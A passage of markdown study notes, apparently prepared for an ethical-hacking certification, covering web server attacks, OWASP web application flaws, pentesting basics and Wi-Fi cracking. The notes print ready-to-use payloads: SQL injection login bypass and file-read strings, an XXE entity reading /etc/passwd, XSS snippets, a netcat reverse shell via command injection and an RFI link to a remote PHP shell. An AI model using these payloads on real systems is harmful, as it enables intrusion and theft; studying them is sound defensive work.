`proc/mounts`, `proc/interrupts` and `proc/cmdline` which would have UML specific settings and information. 294 | * Detecting Sebek-based honeypots, Sebek will log everything that is accessed via `read()` **before** sending to the network, causing congestion that can be an indicator. 295 | * Detecting **snort_inline honeypots**, analyze the outgoing packets by capturing the snort_inline modified packets through another 296 | -------------------------------------------------------------------------------- /13-Hacking-Web-Servers.md: -------------------------------------------------------------------------------- 1 | # Hacking Web Servers 2 | 3 | ## Web Server Attack Methodology 4 | 5 | - **Information Gathering** - Internet searches, whois, reviewing robots.txt 6 | 7 | - **Web Server Footprinting** - banner grabbing 8 | - **Tools** 9 | - Netcraft 10 | - HTTPRecon 11 | - theHarvester 12 | - ID Serve 13 | - HTTPrint 14 | - nmap 15 | - `nmap --script http-trace -p80 localhost` 16 | - Detects vulnerable TRACE method 17 | - `nmap --script http-google-email ` 18 | - Lists email addresses 19 | - `nmap --script hostmap-* ` 20 | - dDiscovers virtual hosts on the IP address you are trying to footprint; * is replaced by online db such as IP2Hosts 21 | - `nmap --script http-enum -p80 ` 22 | - Enumerates common web apps 23 | - `nmap --script http-robots.txt -p 80 ` 24 | - Grabs the robots.txt file 25 | 26 | - **Website Mirroring** - brings the site to your own machine to examine structure, etc. 27 | - **Tools** 28 | - Wget 29 | - BlackWidow 30 | - HTTrack 31 | - WebCopier Pro 32 | - Web Ripper 33 | - SurfOffline 34 | 35 | - **Vulnerability Scanning** - scans web server for vulnerabilities 36 | - **Tools** 37 | - Nessus 38 | - Nikto - specifically suited for web servers; still very noisy like Nessus 39 | 40 | - **Session Hijacking** 41 | 42 | - **Web Server Password Cracking** 43 | 44 | ## Web Server Architecture 45 | 46 | - **Most Popular Servers** - Apache, Microsoft IIS and Nginx 47 | - Apache runs configurations as a part of a module within special files (http.conf, etc.) 48 | - IIS runs all applications in the context of LOCAL_SYSTEM 49 | - IIS 5 had a ton of bugs - easy to get into 50 | - **N-Tier Architecture** - distributes processes across multiple servers; normally as three-tier: Presentation (web), logic (application) and data (database) 51 | - **Error Reporting** - should not be showing errors in production; easy to glean information 52 | - **HTML** - markup language used to display web pages 53 | - **HTTP Request Methods** 54 | - **GET** - retrieves whatever information is in the URL; sending data is done in URL 55 | - **HEAD** - identical to get except for no body return 56 | - **POST** - sends data via body - data not shown in URL or in history 57 | - **PUT** - requests data be stored at the URL 58 | - **DELETE** - requests origin server delete resource 59 | - **TRACE** - requests application layer loopback of message 60 | - **CONNECT** - reserved for use with proxy 61 | - Both POST and GET can be manipulated by a web proxy 62 | - **HTTP Error Messages** 63 | - **1xx: Informational** - request received, continuing 64 | - **2xx: Success** - action received, understood and accepted 65 | - **3xx: Redirection** - further action must be taken 66 | - **4xx: Client Error** - request contains bad syntax or cannot be fulfilled 67 | - **5xx: Server Error** - server failed to fulfill an apparently valid request 68 | 69 | ## Web Server Attacks 70 | 71 | - **DNS Amplification** - Uses recursive DNS to DoS a target; amplifies DNS answers to target until it can't do anything 72 | 73 | - **Directory Transversal** (../ or dot-dot-slash) - requests file that should not be accessible from web server 74 | - Example: http://www.example.com/../../../../etc/password 75 | - Can use Unicode to possibly evade IDS - %2e for dot and %sf for slash 76 | 77 | - **Parameter Tampering** (URL Tampering) - Manipulating parameters within URL to achieve escalation or other changes 78 | 79 | - **Hidden Field Tampering** - Modifying hidden form fields producing unintended results 80 | 81 | - **HTTP Response Splitting** - An attacker passes malicious data to a vulnerable application through the HTTP response header. 82 | 83 | - **Web Cache Poisoning** - Replacing the cache on a box with a malicious version of it 84 | 85 | - **WFETCH** - Microsoft tool that allows you to craft HTTP requests to see response data 86 | 87 | - **Misconfiguration Attack** - Same as before - improper configuration of a web server. (e.g: Default settings like admin/password credentials; Lack of security controls) 88 | 89 | - **Password Attack** - Attempting to crack passwords related to web resources 90 | 91 | - **Connection String Parameter Pollution** - Injection attack that uses semicolons to take advantage of databases that use this separation method 92 | 93 | - **Web Defacement** - Simply modifying a web page to say something else 94 | 95 | - **DoS/DDoS** - Compromise availability 96 | 97 | - **Shellshock** - Causes Bash to unintentionally execute commands when commands are concatenated on the end of function definitions 98 | 99 | - **Tools** 100 | - **Brutus** - brute force web passwords of HTTP 101 | - **Hydra** - network login cracker 102 | - **Metasploit** 103 | - Basic working is Libraries use Interfaces and Modules to send attacks to services 104 | - **Exploits** hold the actual exploit 105 | - **Payload** contains the arbitrary code if exploit is successful 106 | - **Auxiliary** used for one-off actions (like a scan) 107 | - **NOPS** used for buffer-overflow type operations 108 | -------------------------------------------------------------------------------- /14-Hacking-Web-Applications.md: -------------------------------------------------------------------------------- 1 | # Hacking Web Applications 2 | 3 | ## Web Organizations 4 | 5 | - **Internet Engineering Task Force (IETF)** - Creates engineering documents to help make the Internet work better. 6 | - **World Wide Web Consortium (W3C)** - A standards-developing community. 7 | - **Open Web Application Security Project (OWASP)** - Organization focused on improving the security of software. 8 | 9 | ## OWASP Web Top 10 10 | 11 |

12 | 13 |

14 | 15 | *The [OWASP Top 10](https://owasp.org/www-project-top-ten/) is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.* 16 | 17 | - **A1 - Injection Flaws** - SQL, OS and LDAP injection 18 | - **A2 - Broken Authentication and Session Management** - functions related to authentication and session management that aren't implemented correctly 19 | - **A3 - Sensitive Data Exposure** - not properly protecting sensitive data (SSN, CC numbers, etc.) 20 | - **A4 - XML External Entities (XXE)** - exploiting XML processors by uploading hostile content in an XML document 21 | - **A5 - Broken Access Control** - having improper controls on areas that should be protected 22 | - **A6 - Security Misconfiguration** - across all parts of the server and application 23 | - **A7 - Cross-Site Scripting (XSS)** - taking untrusted data and sending it without input validation 24 | - **A8 - Insecure Deserialization** - improperly de-serializing data 25 | - **A9 - Using Components with Known Vulnerabilities** - libraries and frameworks that have known security holes 26 | - **A10 - Insufficient Logging and Monitoring** - not having enough logging to detect attacks 27 | 28 | **WebGoat** - project maintained by OWASP which is an insecure web application meant to be tested 29 | 30 | 31 | ## Web Application Attacks 32 | 33 | - Most often hacked before of inherent weaknesses built into the program 34 | - First step is to identify entry points (POST data, URL parameters, cookies, headers, etc.) 35 | - **Tools for Identifying Entry Points** 36 | - WebScarab 37 | - HTTPPrint 38 | - BurpSuite 39 | - **Web 2.0** - dynamic applications; have a larger attack surface due to simultaneous communication 40 | 41 | --- 42 | ## **SQL Injection** 43 | 44 | Injecting SQL commands into input fields to produce output 45 | - Data Handling - Definition (DDL), manipulation (DML) and control (DCL) 46 | 47 | SQL injection usually occurs when you ask a user for input, like their username/userid, and instead of a name/id, the user gives you an SQL statement that you will unknowingly run on your database. 48 | 49 | - **SQLi is used for**: 50 | - Bypass authentication 51 | - Extract information 52 | - Insert injection 53 | 54 | 55 | **SQL Syntax - Basics:** 56 | 57 | SQL Command | Info. 58 | -- | :-- 59 | ``SELECT`` | extracts data from a database 60 | ``UPDATE`` | updates data in a database 61 | ``DELETE`` | deletes data from a database 62 | ``INSERT INTO`` | inserts new data into a database 63 | ``ALTER TABLE`` | modifies a table 64 | ``DROP TABLE`` | deletes a table 65 | ``CREATE INDEX`` | creates an index (search key) 66 | ``DROP INDEX`` | deletes an index 67 | ``UNION`` | is used to combine the result-set of two or more SELECT statements. 68 | 69 | --- 70 | 71 | ### SQL Injection in action: 72 | 73 | - On the UserId input field, you can enter: 74 | - `105 OR 1=1`. 75 | 76 | - The is valid and will not return only UserId 105, this injection will return ALL rows from the "Users" table, **since OR 1=1 is always TRUE**. Then, the SQL statement will look like this: 77 | - `SELECT * FROM Users WHERE UserId = 105 OR 1=1;` 78 | 79 | - Double dash ( `--` ) tells the server to ignore the rest of the query (in this example, the password check) 80 | 81 | > ⚠️ **Basic test to see if SQL injection is possible is just inserting a single quote ( `'` )** 82 | > - Can be on input field or URL 83 | > - This will make the web app return a SQL syntax error meaning that you are able to inject SQL queries. 84 | 85 | 86 | **Bypassing authentication:** 87 | - `admin' or 1=1 -- ` 88 | - Basically tells the server **if 1 = 1 (always true)** to allow the login and the double dash `--` will comment the rest of the query in this case, the password. 89 | - variations: `1' or 1=1 #` 90 | 91 | - Based on `=` is always true; 92 | - `" or ""="` --> The SQL above is valid and will return all rows from the "Users" table, since OR ""="" is always TRUE. 93 | - This is valid and the SQL statement behind will look like this: ` SELECT * FROM Users WHERE Name ="John Doe" AND Pass ="myPass" ` 94 | 95 | **Enumerating:** 96 | - `1' union all select 1,user() #` 97 | - The service are running as 98 | 99 | - `user' UNION ALL select 1,table_name,3,4,5 FROM information_schema.tables` 100 | - Dropping the tables 101 | 102 | **Load/Reading a file:** 103 | - `bob' union all select 1,load_file("/etc/passwd"),3,4,5 --` 104 | - Reading the /etc/passwd file 105 | 106 | **Writing a file:** 107 | - `bob' union all select 1,"Test",3,4,5 into outfile '/tmp/test.txt'--` 108 | - Writes the selected rows to a file. Column and line terminators can be specified to produce a specific output format. 109 | 110 | **Fuzzing** - inputting random data into a target to see what will happen 111 | 112 | **Tautology** - using always true statements to test SQL (e.g. `1=1`) 113 | 114 | **In-band SQL injection** - uses same communication channel to perform attack 115 | 116 | - Usually is when data pulled can fit into data exported (where data goes to a web table) 117 | 118 | - Best for using `UNION` queries 119 | 120 | **Out-of-band SQL injection** - uses different communication channels (e.g. export results to file on web server) 121 | 122 | **Blind/inferential** - error messages and screen returns don't occur; usually have to guess whether command work or use timing to know 123 | 124 | - **SQLi Tools:** 125 | - Sqlmap 126 | - sqlninja 127 | - Havij 128 | - SQLBrute 129 | - Pangolin 130 | - SQLExec 131 | - Absinthe 132 | - BobCat 133 | 134 | --- 135 | 136 | ### **Broken Authentication** 137 | Broken Authentication usually occurs due to the issues with the application’s authentication mechanism; 138 | 139 | - **Credential Stuffing and Brute Force Attacks** 140 | - **Weak Passwords & Recovery Process** 141 | - **Mismanagement of Session ID** 142 | 143 | *An attacker can gain control over user accounts in a system. In the worst case, it could help them gain complete control over the system.* 144 | 145 | --- 146 | 147 | ### **Command Injection** 148 | Execution of arbitrary commands on the host operating system via a vulnerable application. 149 | - Injection are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. 150 | - Web apps sometimes need to execute OS commands to communicate with the underlying host OS and the file system. This can be done to run system commands, launch applications written in another programming language, or run shell, python, perl, or PHP scripts. 151 | 152 | **Example**: 153 | - Imagine a vulnerable application that has a common function that passes an **IP address from a user input** to the system's **ping command**. 154 | - User input: `127.0.0.1` 155 | - The following command is executed on the host OS: 156 | - `ping -c 5 127.0.0.1` 157 | - Is possible to break out the ping command to execute the attacker arbitrary commands: 158 | - `ping -c 5 127.0.0.1; id` 159 | - If the system is vulnerable the output will look like this (showing two OS commands, `ping` and `id`): 160 | 161 | ```console 162 | --- 127.0.0.1 ping statistics --- 163 | 5 packets transmitted, 5 received, 0% packet loss, time 3999ms 164 | rtt min/avg/max/mdev = 0.023/0.056/0.074/0.021 ms 165 | 166 | uid=0(root) gid=0(root) groups=0(root) 167 | ``` 168 | 169 | - Without input sanitizing the attacker can do reverse shell: 170 | - `127.0.0.1; nc -nv 4444 -e /bin/bash` 171 | 172 | --- 173 | 174 | ### **Sensitive Data Exposure** 175 | 176 | When the web application doesn’t adequately protect sensitive information like **session tokens, passwords, banking information, location, health data**, or any other similar crucial data whose leak can be critical for the user. 177 | 178 | **Examples**: 179 | 1. *An application **stores credit card numbers in a database without encryption**. If an attacker gets access to the database through SQL injection, he could easily get the credit card numbers.* 180 | 181 | 2. **An application store passwords in the database using unsalted or simple hashes**. An attacker can expose the unsalted hashes using Rainbow Table attacks. 182 | 183 | 3. **A website that doesn’t enforce TLS or uses weak encryption.** An attacker could monitor network traffic and downgrade the connections from HTTPS to HTTP. Then, they can intercept the requests and steal the user’s session cookie 184 | 185 | --- 186 | 187 | ### **XEE - XML External Entities** 188 | Is a type of attack against an application that parses XML input. This attack occurs when **XML input containing a reference to an external entity is processed by a weakly configured XML parser.** 189 | 190 | - Attackers can supply XML files with specially crafted DOCTYPE definitions to an XML parser with a weak security configuration to perform **path traversal, port scanning, and numerous attacks, including denial of service, server-side request forgery (SSRF), or even remote code execution.** 191 | 192 | **Example**: 193 | 194 | - External entities can reference URIs to retrieve content from local files or network resources. 195 | - This payload will return the content of `/etc/passwd` file on target system's OS; (for windows you could reference `file:///c:/boot.ini` ) 196 | 197 | ```xml 198 | 199 | 201 | ]> 202 | &xxe; 203 | ``` 204 | 205 | ___ 206 | 207 | ### **RFI - Remote File Inclusion** 208 | 209 | Is a method that allows an attacker to employ a script to include a remotely hosted file on the webserver. The vulnerability promoting RFI is largely found on websites running on PHP. This is because PHP supports the ability to `‘include’` or `‘require’` additional files within a script; 210 | 211 | **Vulnerable PHP Example**: 212 | 213 | > **`$incfile = $_REQUEST["file"]; include($incfile.".php");`** 214 | 215 | - The first line extracts the file parameter value from the HTTP request, while the second line uses that value to dynamically set the file name, without any appropriate sanitization of the file parameter value, this code can be exploited for unauthorized file uploads. 216 | 217 | - For example the URL below contains an external reference to a reverse shell made in PHP file, stored in a remote location: 218 | - `http://www.example.com/vuln_page.php?file=http://www.hacker.com/netcat.php_` 219 | 220 | --- 221 | 222 | 223 | ### **LFI - Local File Inclusion**: 224 | is very much similar to RFI. The only difference being that in LFI, in order to carry out the attack instead of including remote files, the attacker has to use local files (e.g: files on the current server can only be used to execute a malicious script). 225 | 226 | **Examples**: 227 | - `http://example.com/?file=../../uploads/evil.php` 228 | 229 | --- 230 | 231 | ### **Directory Traversal** 232 | An attacker can get sensitive information like the contents of the /etc/passwd file that contains a list of users on the server; Log files, source code, access.log and so on 233 | 234 | **Examples:** 235 | - `http://example.com/events.php?file=../../../../etc/passwd` 236 | - An attacker can get the contents of the **/etc/passwd** (file that contains a list of users on the server). 237 | 238 | *Similarly, an attacker may leverage the Directory Traversal vulnerability to access **log files** (for example, **Apache access.log or error.log**), **source code**, and other sensitive information. This information may then be used to advance an attack.* 239 | 240 | --- 241 | ### **XSS (Cross-site scripting)** 242 | Inputting JavaScript into a web form input field that alters what the page does. 243 | - Can also be passed via URL 244 | - Can be malicious by accessing cookies and sending them to a remote host 245 | - Can be mitigated by setting **HttpOnly** flag for cookies; But many hackers can circumvent this in order to execute XSS payloads. 246 | 247 | ### Types of XSS: 248 | 249 | 1. **Stored XSS** (Persistent or Type-I) - stores the XSS in a forum or like for multiple people to access. 250 | 251 | 2. **Reflected XSS** (or also called a non-persistent XSS); when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way. 252 | 253 | 3. **DOM Based XSS** (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim's browser used by the original client side script, so that the client side code runs in an “unexpected” manner. 254 | 255 | Examples of XSS payloads: 256 | - `">` 257 | - ```` 259 | - `p=` 260 | 261 | *Note: they vary regarding the filtering, validation and WAF capabilities.* 262 | 263 | --- 264 | ### **HTML Injection** 265 | This vulnerability **occurs when user input is not correctly sanitized and the output is not encoded.** An injection allows the attacker to send a malicious HTML page to a victim. 266 | 267 | --- 268 | ### **LDAP Injection** 269 | Exploits applications that construct LDAP statements 270 | - Format for LDAP injection includes )(&) 271 | --- 272 | 273 | ### **SOAP Injection** 274 | Inject query strings in order to bypass authentication 275 | - SOAP uses XML to format information 276 | - Messages are "one way" in nature 277 | --- 278 | ### **Buffer Overflow** 279 | Attempts to write data into application's buffer area to overwrite adjacent memory, execute code or crash a system 280 | - Inputs more data than the buffer is allowed 281 | - Includes stack, heap, NOP sleds and more 282 | - **Canaries** - systems can monitor these - if they are changed, they indicate a buffer overflow has occurred; placed between buffer and control data 283 | --- 284 | 285 | ### **Cross-Site Request Forgery (CSRF)** 286 | Forces an end user to execute unwanted actions on an app they're already authenticated on 287 | - Inherits identity and privileges of victim to perform an undesired function on victim's behalf 288 | - Captures the session and sends a request based off the logged in user's credentials 289 | - Can be mitigated by sending **random challenge tokens** 290 | 291 | --- 292 | 293 | ### **Session Fixation** 294 | Attacker logs into a legitimate site and pulls a session ID; sends link with session ID to victim. Once victim logs in, attacker can now log in and run with user's credentials 295 | 296 | - **Cookies** - small text-based files stored that contains information like preferences, session details or shopping cart contents 297 | - Can be manipulated to change functionality (e.g. changing a cooking that says "ADMIN=no" to "yes") 298 | - Sometimes, but rarely, can also contain passwords 299 | 300 | --- 301 | ### **HTTP Response Splitting** 302 | Adds header response data to an input field so server splits the response 303 | - Can be used to redirect a user to a malicious site 304 | - Is not an attack in and of itself - must be combined with another attack 305 | - With HTTP Response Splitting, it is possible to mount various kinds of attacks: 306 | - XSS 307 | - Web Cache Poisoning (defacement) 308 | - Browser cache poisoning 309 | - Hijacking pages with user-specific information 310 | --- 311 | 312 | ### **Insecure direct object references (IDOR)** 313 | Is a common vulnerability that occurs when a reference to an **internal implementation object is exposed without any other access control**. The vulnerability is often easy to discover and allows attackers to access unauthorized data. 314 | 315 |

316 | 317 |

318 | 319 | --- 320 | ## Countermeasures 321 | Input scrubbing for injection, SQL parameterization for SQL injection, input validation and sanitization for injections, keeping patched servers, turning off unnecessary services, ports and protocols 322 | -------------------------------------------------------------------------------- /14-Pentesting.md: -------------------------------------------------------------------------------- 1 | # Pentesting 2 | *A penetration test, colloquially known as a pen test, pentest or ethical hacking, is an authorized simulated cyberattack on a computer system, performed to evaluate the security of the system.* 3 | 4 | ### Security Assessments: 5 | 6 | - **Security Assessment** - Test performed in order to assess the level of security on a network or system. 7 | 8 | - **Security Audit** - Policy and procedure focused; tests whether organization is following specific standards and policies; look on compliances only. 9 | 10 | - **Vulnerability Assessment** - Scans and tests for vulnerabilities but does not intentionally exploit them. 11 | 12 | - **Penetration Test** - Looks for vulnerabilities and actively seeks to exploit them. 13 | 14 | ### InfoSec Teams 🗡🛡 15 | - 🔵 **Blue Team** *(defenders)* 16 | - Implement security policy 17 | - Implement technical controls 18 | - Detect and defend against Red Team 19 | - 🔴 **Red Team** *(attackers)* 20 | - Perform penetration testing 21 | - Act as any true outside threat in an attempt to gain unauthorized access to client's system(s) 22 | 23 | ## Types of Pen Tests 24 | **External assessment** - Analyzes publicly available information; conducts network scanning, enumeration and testing from the network perimeter. 25 | 26 | **Internal Assessment** - Performed from within the organization, from various network access points. 27 | 28 | ### Pentesting boxes: 29 | > - **Black Box** - Done **without any knowledge** of the system or network. 30 | > - **White Box** - When the attacker **have complete knowledge** of the system provided by the owner/target. 31 | > - **Gray Box** - When the attacker has **some knowledge** of the system and/or network 32 | 33 | - **Automated Testing Tools** 34 | - **Codenomicon** - utilizes fuzz testing that learns the tested system automatically; allows for pen testers to enter new domains such as VoIP assessment, etc. 35 | - **Core Impact Pro** - best known, all-inclusive automated testing framework; tests everything from web applications and individual systems to network devices and wireless 36 | - **Metasploit** - framework for developing and executing code against a remote target machine 37 | - **CANVAS** - hundreds of exploits, automated exploitation system and extensive exploit development framework 38 | 39 | ### Pen test Phases 40 | 1. **Pre-Attack Phase** - Reconnaissance and data-gathering. 41 | 2. **Attack Phase** - Attempts to penetrate the network and execute attacks. 42 | 3. **Post-Attack Phase** - Cleanup to return a system to the pre-attack condition and deliver reports. 43 | 44 | ## Security Assessment Deliverables 45 | 46 | - Usually begins with a brief to management 47 | - Provides information about your team and the overview of the original agreement 48 | - Explain what tests were done and the results of them 49 | - **Comprehensive Report Parts** 50 | - Executive summary of the organization's security posture 51 | - Names of all participants and dates of tests 52 | - List of all findings, presented in order of risk 53 | - Analysis of each finding and recommended mitigation steps 54 | - Log files and other evidence (screenshots, etc.) 55 | - Example reports and methodology can be found in the **Open Source Testing Methodology Manual** (OSSTMM) 56 | 57 | ## Terminology 58 | 59 | - **Types of Insiders** 60 | - **Pure Insider** - employee with all rights and access associated with being an employee 61 | - **Elevated Pure Insider** - employee who has admin privileges 62 | - **Insider Associate** - someone with limited authorized access such as a contractor, guard or cleaning service person 63 | - **Insider Affiliate** - spouse, friend or client of an employee who uses the employee's credentials to gain access 64 | - **Outside Affiliate** - someone outside the organization who uses an open access channel to gain access to an organization's resources 65 | 66 | ## Vulnerabilities 67 | 68 | - **CVSS - Common Vulnerability Scoring System** - places numerical score based on severity; 69 | 70 | - **Qualitative severity rating scale:** 71 | 72 | Rating | CVSS Score 73 | --|-- 74 | None | 0.0 75 | Low | 0.1 - 3.9 76 | Medium | 4.0 - 6.9 77 | High | 7.0 - 8.9 78 | Critical | 9.0 - 10.0 79 | 80 | - **CVE – Common Vulnerabilities and Exposures** 81 | - Is a list of publicly disclosed vulnerabilities and exposures that is maintained by MITRE. 82 | - **NVD - National Vulnerability Database** 83 | - is a database, maintained by NIST, that is fully synchronized with the MITRE CVE list; US Gov. vulnerabilities repository. -------------------------------------------------------------------------------- /16-Hacking-Wireless-Networks.md: -------------------------------------------------------------------------------- 1 | # Hacking Wireless Networks 2 | 3 | ## Concepts and Terminology 4 | 5 | ### BSSID 6 | **Basic Service Set Identifier (BSSID)** - **MAC address** of the wireless access point 7 | 8 | 9 | ### SSID 10 | **Service Set Identifier (SSID)** - Is a name of a network; text word (<= 32 char) that identifies network; provides no security. 11 | 12 | ### ESSID 13 | **Extended Service Set Identifier (ESSID)** - An extended basic service set (ESS) consists of all of the BSSs in the network. For all practical purposes, the ESSID identifies the same network as the SSID does. **The term SSID is used most often.** 14 | 15 | - **802.11 Series** - defines the standards for wireless networks 16 | - **802.15.1** - Bluetooth 17 | - **802.15.4** - Zigbee - low power, low data rate, close proximity ad-hoc networks 18 | - **802.16** - WiMAX - broadband wireless metropolitan area networks 19 | 20 | 21 | - **Basic Service Set (BSS)** - communication between a single AP and its clients 22 | 23 | - **Orthogonal Frequency-Division Multiplexing (OFDM)** - carries waves in various channels. 24 | 25 | - **Multiple-Input Multiple-Output (MIMO)** - MIMO uses multiple antennas at the transmitting and receiving sides to improve spectral efficiency by capitalizing on transmission and spatial diversities along with multipath propagation. 26 | 27 | - **ISM Band** - The ISM radio bands are portions of the radio spectrum reserved internationally for industrial, scientific and medical (ISM) purposes other than telecommunications. Examples of applications for the use of radio frequency (RF) energy in these bands include radio-frequency process heating, microwave ovens, and medical diathermy machines. 28 | 29 | ### **DSSS and FHSSS spectrums:** 30 | ![dsss](https://www.researchgate.net/profile/Edi_Kurniawan/publication/329286286/figure/fig1/AS:698501847580681@1543547226994/Frequency-spectrum-of-a-DSSS-b-FHSS.png) 31 | - **Direct-Sequence Spread Spectrum (DSSS)** - Combines all available waveforms into a single purpose. 32 | 33 | - **Frequency-hopping spread spectrum (FHSS)** - Is a method of transmitting radio signals by rapidly changing the carrier frequency among many distinct frequencies occupying a large spectral band. 34 | 35 | 36 | - **Spectrum Analyzer** - verifies wireless quality, detects rogue access points and detects attacks 37 | 38 | ### **Wireless Standards**: 39 | | Wireless Standard | Operating Speed (Mbps) | Frequency (GHz) | Modulation Type | 40 | |-------------------|------------------------|-----------------|-----------------| 41 | | 802.11a | 54 Mbps | 5 GHz | OFDM | 42 | | 802.11b | 11 Mbps | 2.4 GHz | DSSS | 43 | | 802.11g | 54 Mbps | 2.4 GHz | OFDM and DSSS | 44 | | 802.11n | 600 Mbps | 2.4-5 GHz | OFDM | 45 | | 802.11ac | 1000 Mbps | 5 GHz | QAM | 46 | 47 | 48 | ### **Authentication** 49 | - **Three Types of Authentication** 50 | - **Open System** - no authentication 51 | - **Shared Key Authentication** - authentication through a shared key (password) 52 | - **Centralized Authentication** - authentication through something like **RADIUS** 53 | - **Association** is the act of connecting; **authentication** is the act of identifying the client 54 | Antenna Types: 55 | 56 | > ⚠️ **RADIUS** is a networking protocol, operating on port 1812, that provides centralized Authentication, Authorization, and Accounting (AAA or Triple A) management for users who connect and use a network service. 57 | 58 | ### **Antenna Types:** 59 |

60 | 61 |

62 | 63 | * **Omnidirectional antenna** 64 | * Signals goes on every direction like a dome. 65 | * **Dipole antenna** 66 | * Goes on two directions. 67 | * **Directional antenna** 68 | * Long individual beam, increased distances. 69 | * **Yagi antenna** 70 | - Very directional and high gain. 71 | * **Parabolic antenna** 72 | - Focus the signal to a single point. 73 | * **Patch Graphic antenna** 74 | * Half Omni (e.g stick to the wall the get one side signals). 75 | 76 | 77 | ## Wireless Encryption Schemes 78 | 79 | ## Wireless Security 80 | ### **WEP** - Wireless Equivalency Privacy 81 | 82 | * 64/128 bit RC4 ICV 83 | * **RC4** - Rivest Cipher 4 Stream Cipher Algorithm
84 | * **ICV** - Integrity Check Value 85 | 86 | > ⚠️ Very old and insecure 87 | 88 | ### **WPA** - Wi-Fi Protected Access 89 | 90 | * Uses RC4 with TKIP (Temporal Key Integrity Protocol) 91 | - Initialization Vector (IV) is larger and an encrypted hash 92 | - Every packet gets a unique 128-bit encryption key 93 | * **Personal | WPA-PSK** 94 | - TKIP + **PSK** 95 | - 64/128 bit **RC4 MIC** 96 | - Everyone uses the same 256-bit key 97 | * **Enterprise | WPA-802.1X** 98 | - TKIP + **RADIUS** 99 | - 64/128 bit **RC4 MIC** 100 | - Authenticates users individually with an authentication server (e.g., RADIUS) 101 | 102 | #### About TKIP - Temporal Key Integrity Protocol 103 | - Mixed the keys 104 | - Combines the secret root key with the IV 105 | - Adds sequence counter 106 | - Prevents replay attacks 107 | - Implements a 64-bit Message Integrity Check 108 | - Protecting against tampering 109 | - TKIP has it's own set of vulnerabilities 110 | - Deprecated in the 802.11-2012 standard 111 | 112 | ### **WPA2** - Wi-Fi Protected Access v2 113 | 114 | * **802.11i** IEEE standard 115 | * Enterprise 116 | * CCMP + **RADIUS** 117 | * 128 bit **AES MIC Encryption** 118 | 119 | * Personal 120 | * CCMP + **PSK** (Pre Shared Key) 121 | * 128 bit **AES MIC Encryption** 122 | 123 | - AES (Advanced Encryption Standard) replaced RC4 124 | - CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol) replaced TKIP 125 | 126 | * **About CCMP** 127 | - Uses AES for data confidentiality 128 | - 128-bit key and a 128-bit block size 129 | - Requires additional computing resources 130 | - **CCMP provides Data confidentiality (AES), authentication, and access control** 131 | 132 |

133 | 134 |

135 | 136 | | Wireless Standard | Encryption | IV Size (Bits) | Key Length (Bits) | Integrity Check | 137 | |-------------------|------------|----------------|-------------------|-----------------| 138 | | WEP | RC4 | 24 | 40/104 | CRC-32 | 139 | | WPA | RC4 + TKIP | 48 | 128 | Michael/CRC-32 | 140 | | WPA2 | AES-CCMP | 48 | 128 | CBC-MAC (CCMP) | 141 | 142 | --- 143 | 144 | ## Wireless Hacking 145 | 146 | - **Threats** 147 | - Access Control Attacks 148 | - Integrity Attacks 149 | - Confidentiality Attacks 150 | - Availability Attacks 151 | - Authentication Attacks 152 | 153 | - **Network Discovery** 154 | - Wardriving, warflying, warwalking, etc. 155 | - Tools such as WiFiExplorer, WiFiFoFum, OpenSignalMaps, WiFinder 156 | - **WIGLE** - map for wireless networks 157 | - **NetStumbler** - tool to find networks 158 | - **Kismet** - wireless packet analyzer/sniffer that can be used for discovery 159 | - Works without sending any packets (passively) 160 | - Can detects access points that have not been configured 161 | - Works by channel hopping 162 | - Can discover networks not sending beacon frames 163 | - Ability to sniff packets and save them to a log file (readable by Wireshark/tcpdump) 164 | - **NetSurveyor** - tool for Windows that does similar features to NetStumbler and Kismet 165 | - Doesn't require special drivers 166 | 167 | - **WiFi Adapter** 168 | - AirPcap is mentioned for Windows, but isn't made anymore 169 | - **pcap** - driver library for Windows 170 | - **libpcap** - driver library for Linux 171 | 172 | ## Wireless Attacks 173 | 174 | - **Rogue Access Point** - Unauthorized access point plugged into a wired one. (Can be accidental) 175 | - Tools for Rogue AP: **Wi-Fi Pumpkin**, **Wi-Fi Pineapple** 176 | - **Evil Twin** - Is a Rogue AP tha is broadcasting **the same (or very similar) SSID**. 177 | - Also known as a mis-association attack 178 | - **Honeyspot** - faking a well-known hotspot with a rogue AP 179 | - **Ad Hoc Connection Attack** - connecting directly to another phone via ad-hoc network 180 | - Not very successful as the other user has to accept connection 181 | - **DoS Attack** - either sends de-auth packets to the AP or jam the wireless signal 182 | - With a de-auth, you can have the users connect to your AP instead if it has the same name 183 | - Jammers are very dangerous as they are illegal 184 | - **MAC Filter** - only allows certain MAC addresses on a network 185 | - Easily broken because you can sniff out MAC addresses already connected and spoof it 186 | - Tools for spoofing include: **SMAC** and **TMAC** 187 | 188 | ## Wireless Encryption Attacks 189 | 190 | ### **WEP Cracking** 191 | - To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Attackers can use injection to speed up the process by replaying packets 192 | 193 | 194 | - **Process:** 195 | 1. Start the wireless interface in monitor mode on the specific AP channel 196 | 2. Test the injection capability of the wireless device to the AP 197 | 3. Use aireplay-ng to do a fake authentication with the access point 198 | 4. Start airodump-ng on AP channel with a BSSID filter to collect the new unique IVs 199 | 5. Start aireplay-ng in ARP request replay mode to inject packets 200 | 6. Run aircrack-ng to crack key using the IVs collected 201 | 202 | ### **WPA/WPA2 Cracking** 203 | - Much more difficult than WEP 204 | - Uses a constantly changing temporal key and user-defined password 205 | - **Key Reinstallation Attack** (KRACK) - replay attack that uses third handshake of another device's session 206 | - Most other attacks are simply brute-forcing the password 207 | 208 | - **Process:** 209 | 1. Start monitoring and find the BSSID (e.g: using `airodump-ng`) 210 | 2. Start monitoring only the BSSID with .cap output file 211 | 3. The goal is to grab a WPA handshake; The attacker can wait to some client to connect to grab the handshake /or use a deauth attack to deauthenticate a client to make him/her connect again. 212 | 4. Start `aircrack-ng` using a good wordlist to brute force the .cap file that you recorded on step 2. 213 | 214 | 215 | ### **Tools:** 216 | - **Aircrack-ng Suite** - is a complete suite of tools to assess WiFi network security. 217 | 1. **Monitoring:** Packet capture and export of data to text files for further processing by third party tools. 218 | 2. **Attacking:** Replay attacks, deauthentication, fake access points and others via packet injection. 219 | 3. **Testing:** Checking WiFi cards and driver capabilities (capture and injection). 220 | - **`airodump-ng`** - Airodump-ng is used for packet capturing of raw 802.11 frames and is particularly suitable for collecting WEP 